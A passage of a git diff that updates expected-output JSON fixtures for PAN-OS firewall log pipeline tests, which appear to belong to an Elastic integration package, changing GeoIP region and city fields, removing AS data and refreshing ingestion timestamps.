"country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10597,7 +10292,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692001400Z", + "ingested": "2021-12-14T14:50:40.980258895Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10625,22 +10320,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10771,7 +10461,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692007700Z", + "ingested": "2021-12-14T14:50:40.980259243Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10799,22 +10489,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10945,7 +10630,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692014Z", + "ingested": "2021-12-14T14:50:40.980259593Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10973,22 +10658,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11119,7 +10799,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692020400Z", + "ingested": "2021-12-14T14:50:40.980259934Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -11147,22 +10827,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11293,7 +10968,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692026700Z", + "ingested": "2021-12-14T14:50:40.980260268Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -11321,22 +10996,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11467,7 +11137,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692033Z", + "ingested": "2021-12-14T14:50:40.980260617Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11495,22 +11165,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11641,7 +11306,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692039200Z", + "ingested": "2021-12-14T14:50:40.980260970Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11669,22 +11334,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11815,7 +11475,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692045400Z", + "ingested": "2021-12-14T14:50:40.980261312Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11843,22 +11503,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -11989,7 +11644,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692084200Z", + "ingested": "2021-12-14T14:50:40.980261663Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12017,22 +11672,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -12163,7 +11813,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692088300Z", + "ingested": "2021-12-14T14:50:40.980262008Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12191,22 +11841,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -12337,7 +11982,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692092300Z", + "ingested": "2021-12-14T14:50:40.980262357Z", "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12365,22 +12010,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -12511,7 +12151,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692097900Z", + "ingested": "2021-12-14T14:50:40.980262698Z", "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12539,22 +12179,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -12685,7 +12320,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692102700Z", + "ingested": "2021-12-14T14:50:40.980263034Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -12713,22 +12348,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -12859,7 +12489,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692107500Z", + "ingested": "2021-12-14T14:50:40.980263395Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -12887,22 +12517,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -13033,7 +12658,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692112200Z", + "ingested": "2021-12-14T14:50:40.980263852Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -13061,22 +12686,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -13207,7 +12827,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692116100Z", + "ingested": "2021-12-14T14:50:40.980264196Z", "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:29.000-05:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json index 963b8376a9e..c00395a8af5 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json @@ -8,26 +8,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5976, - "ip": "175.16.199.1", - "packets": 20 + "packets": 20, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -149,7 +144,7 @@ }, "event": { "duration": 586000000000, - "ingested": "2021-12-09T13:44:05.031440300Z", + "ingested": "2021-12-14T14:51:01.287194865Z", "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:07.000-05:00", "timezone": "America/New_York", @@ -177,26 +172,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -309,7 +299,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031448500Z", + "ingested": "2021-12-14T14:51:01.287197236Z", "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", @@ -337,26 +327,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 1035, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -478,7 +463,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031454100Z", + "ingested": "2021-12-14T14:51:01.287197683Z", "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", @@ -506,26 +491,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -638,7 +618,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031459500Z", + "ingested": "2021-12-14T14:51:01.287198017Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", @@ -666,26 +646,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 1613, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -807,7 +782,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031465Z", + "ingested": "2021-12-14T14:51:01.287198356Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", @@ -835,26 +810,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 21111, - "ip": "175.16.199.1", - "packets": 51 + "packets": 51, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -976,7 +946,7 @@ }, "event": { "duration": 85000000000, - "ingested": "2021-12-09T13:44:05.031470500Z", + "ingested": "2021-12-14T14:51:01.287198680Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 